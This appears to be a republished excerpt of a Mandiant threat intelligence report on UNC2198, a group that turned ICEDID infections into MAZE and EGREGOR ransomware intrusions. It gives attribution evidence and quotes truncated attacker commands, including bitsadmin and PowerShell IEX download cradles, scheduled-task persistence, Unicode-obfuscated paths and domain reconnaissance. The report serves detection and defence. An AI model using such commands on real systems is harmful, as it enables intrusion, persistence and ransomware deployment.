Read the original article: So Unchill: Melting UNC2198 ICEDID to Ransomware Operations
Mandiant Advanced Practices (AP) closely tracks the shifting tactics,
techniques, and procedures (TTPs) of financially motivated groups who
severely disrupt organizations with ransomware. In May 2020, FireEye
released a blog
post detailing intrusion tradecraft associated with the deployment
of MAZE. As of publishing this post, we track 11 distinct groups
that have deployed MAZE ransomware. At the close of 2020, we noticed a
shift in a subset of these groups that have started to deploy EGREGOR
ransomware in favor of MAZE ransomware following access acquired from
ICEDID infections.
Since its discovery in 2017 as a banking trojan, ICEDID evolved into
a pernicious point of entry for financially motivated actors to
conduct intrusion operations. In earlier years, ICEDID was deployed to
primarily target banking credentials. In 2020 we observed adversaries
using ICEDID more explicitly as a tool to enable access to impacted
networks, and in many cases this was leading to the use of common
post-exploitation frameworks and ultimately the deployment of
ransomware. This blog post shines a heat lamp on the latest tradecraft
of UNC2198, who used ICEDID infections to deploy MAZE or
EGREGOR ransomware.
Building an Igloo: ICEDID Infections
Separate phases of intrusions are attributed to different
uncategorized (UNC) groups when discrete operations such as obtaining
access are not part of a contiguous operation. Pure “access
operations” establish remote access into a target environment for
follow on operations actioned by a separate group. A backdoor deployed
to establish an initial foothold for another group is an example of an
access operation.
Between July and December 2020, an ICEDID phishing infection chain
consisted of a multi-stage process involving MOUSEISLAND and
PHOTOLOADER (Figure 1).
Figure 1: Example UNC2420 MOUSEISLAND to
ICEDID Infection Chain
MOUSEISLAND is a Microsoft Word macro downloader used as the first
infection stage and is delivered inside a password-protected zip
attached to a phishing email (Figure 2). Based on our intrusion data
from responding to ICEDID related incidents, the secondary payload
delivered by MOUSEISLAND has been PHOTOLOADER, which acts as an
intermediary downloader to install ICEDID. Mandiant attributes the
MOUSEISLAND distribution of PHOTOLOADER and other payloads to UNC2420,
a distribution threat cluster created by Mandiant’s Threat Pursuit
team. UNC2420 activity shares overlaps with the publicly reported
nomenclature of “Shathak” or “TA551”.
Figure 2: UNC2420 MOUSEISLAND Phishing Email
Ice, Ice, BEACON…UNC2198
Although analysis is always ongoing, at the time of publishing this
blog post, Mandiant tracks multiple distinct threat clusters (UNC
groups) of various sizes that have used ICEDID as a foothold to enable
intrusion operations. The most prominent of these threat clusters is
UNC2198,
a group that has targeted organizations in North America across a
breadth of industries. In at least five cases, UNC2198 acquired
initial access from UNC2420 MOUSEISLAND to conduct intrusion
operations. In 2020, Mandiant attributed nine separate intrusions to
UNC2198. UNC2198’s objective is to monetize their intrusions by
compromising victim networks with ransomware. In July 2020,
Mandiant observed UNC2198 leverage network access provided by an
ICEDID infection to encrypt an environment with MAZE ransomware. As
the year progressed into October and November, we observed UNC2198
shift from deploying MAZE to using EGREGOR ransomware during another
Incident Response engagement. Like MAZE, EGREGOR is operated using an
affiliate
model, where affiliates who deploy EGREGOR are provided with
proceeds following successful encryption and extortion for payment.
The UNC2198 cluster expanded over the course of more than six
months. Mandiant’s December
2020 blog post on UNCs described the analytical tradecraft we
use to merge and graduate clusters of activity. Merging UNCs is a
substantial analytical practice in which indicators and tradecraft
attributed to one group are scrutinized against another. Two former
UNCs that shared similar modus operandi were eventually merged into UNC2198.
The Snowball Effect of Attribution
AP created UNC2198 based on a single intrusion in June 2020
involving ICEDID, BEACON, SYSTEMBC and WINDARC. UNC2198 compromised 32
systems in 26 hours during this incident; however, ransomware was not
deployed. Throughout July 2020 we attributed three intrusions to
UNC2198 from Incident Response engagements, including one resulting in
the deployment of MAZE ransomware. In October 2020, a slew of activity
at both Incident Response engagements and Managed Defense clients
resulted in the creation of two new UNC groups, and another incident
attributed to UNC2198.
One of the new UNC groups created in October 2020 was given the
designation UNC2374. UNC2374 began as its own distinct cluster where
BEACON, WINDARC, and SYSTEMBC were observed during an incident at a
Managed Defense customer. Initial similarities in tooling did not
constitute a strong enough link to merge UNC2374 with UNC2198 yet.
Two and a half months following the creation of UNC2374, we amassed
enough data points to merge UNC2374 into UNC2198. Some of the data
points used in merging UNC2374 into UNC2198 include:
- UNC2198 and UNC2374 Cobalt Strike Team Servers used
self-signed certificates with the following subject on TCP port
25055:
|
C = US, ST = CA, L = California, O = Oracle |
- UNC2198 and UNC2374 deployed WINDARC malware to identical file
paths: %APPDATA%\teamviewers\msi.dll - The same code signing certificate used to sign an UNC2198 BEACON
loader was used to sign two UNC2374 SYSTEMBC tunneler payloads. - UNC2374 and UNC2198 BEACON C2 servers were accessed by the same
victim system within a 10-minute time window during intrusion
operations.
The other UNC group created in October 2020 was given the
designation UNC2414. Three separate intrusions were attributed to
UNC2414, and as the cluster grew, we surfaced similarities between
UNC2414 and UNC2198. A subset of the data points used to merge UNC2414
into UNC2198 include:
- UNC2198 and UNC2414 BEACON servers used self-signed
certificates using the following subject on TCP port 25055:
|
C = US, ST = CA, L = California, O = Oracle |
- UNC2198 and UNC2414 installed BEACON as
C:\Windows\int32.dll - UNC2198 and UNC2414 installed the
RCLONE utility as C:\Perflogs\rclone.exe - UNC2198 and
UNC2414 were proven to be financially motivated actors that had
leveraged ICEDID as initial access:- UNC2198 had deployed
MAZE - UNC2414 had deployed EGREGOR
- UNC2198 had deployed
The merge between UNC2198 and UNC2414 was significant because it
revealed UNC2198 has access to EGREGOR ransomware. The timing of the
EGREGOR usage is also consistent with MAZE ransomware shutting down as
reported
by Mandiant Intelligence. Figure 3 depicts the timeline of related
intrusions and merges into UNC2198.
Figure 3: UNC2198 timeline
UNC2198 Intrusion Flow: After Initial Access
Expanding the UNC2198 cluster through multiple intrusions and merges
with other UNC groups highlights the range of TTPs employed. We have
pulled out some key data from all our UNC2198 intrusions to illustrate
an amalgamation of capabilities used by the threat actor.
Establish Foothold
After obtaining access, UNC2198 has deployed additional malware
using various techniques. For instance, UNC2198 used InnoSetup
droppers to install a WINDARC backdoor on the target host. UNC2198
also used BITS Jobs and remote PowerShell downloads to download
additional tools like SYSTEMBC for proxy and tunneler capabilities.
Example commands for download and execution are:
|
%COMSPEC% /C echo bitsadmin /transfer 257e
%COMSPEC% /C echo powershell.exe -nop -w |
UNC2198 has used Cobalt Strike BEACON, Metasploit METERPRETER,
KOADIC, and PowerShell EMPIRE
offensive security tools during
this phase as well.
Offensive Security Tooling
UNC2198 has used offensive security tools similarly seen across many
threat actors. UNC2198 has used BEACON in roughly 90% of their
intrusions. UNC2198 installs and executes Cobalt Strike BEACON in a
variety of ways, including shellcode loaders using PowerShell scripts,
service executables, and DLLs. While the ways and means of using
BEACON are not inherently unique, there are still aspects to
extrapolate that shed light on UNC2198 TTPs.
Focusing in on specific BEACON executables tells a different story
beyond the use of the tool itself. Aside from junk code and API calls,
UNC2198 BEACON and METERPRETER executables often exhibit unique
characteristics of malware packaging, including odd command-line
arguments visible within strings and upon execution via child processes:
|
cmd.exe /c echo TjsfoRdwOe=9931 & reg
cmd.exe /c echo ucQhymDRSRvq=1236 & reg
cmd.exe /c set XlOLqhCejHbSNW=8300 & |
These example commands are non-functional, as they do not modify or
alter payload execution.
Another technique involves installing BEACON using a file path
containing mixed Unicode-escaped and ASCII characters to evade detection:
|
Unicode Escaped |
C:\ProgramData\S\u0443sH\u0435\u0430ls\T\u0430s\u0441host.exe |
|
Unicode Unescaped |
C:\ProgramData\SуsHеаls\Tаsсhost.exe |
The executable was then executed by using a Scheduled Task named
shadowdev:
|
cmd.exe /c schtasks /create /sc minute /mo |
While the previous examples are related to compiled executables,
UNC2198 has also used simple PowerShell download cradles to execute
Base64-encoded and compressed BEACON stagers in memory:
|
powershell -nop -w hidden -c IEX
powershell.exe -nop -w hidden -c IEX
powershell.exe -nop -w hidden -c "IEX |
Discovery and Reconnaissance
UNC2198 has exhibited common TTPs seen across many threat groups
during discovery and reconnaissance activities. UNC2198 has used the
BloodHound active directory mapping utility during intrusions
from within the “C:\ProgramData” and “C:\Temp” directories.
The following are collective examples of various commands executed
by UNC2198 over time to enumerate a compromised environment:
|
arp -a
net user <Redacted>
nltest /domain_trusts |
Lateral Movement an
[…]
Read the original article: So Unchill: Melting UNC2198 ICEDID to Ransomware Operations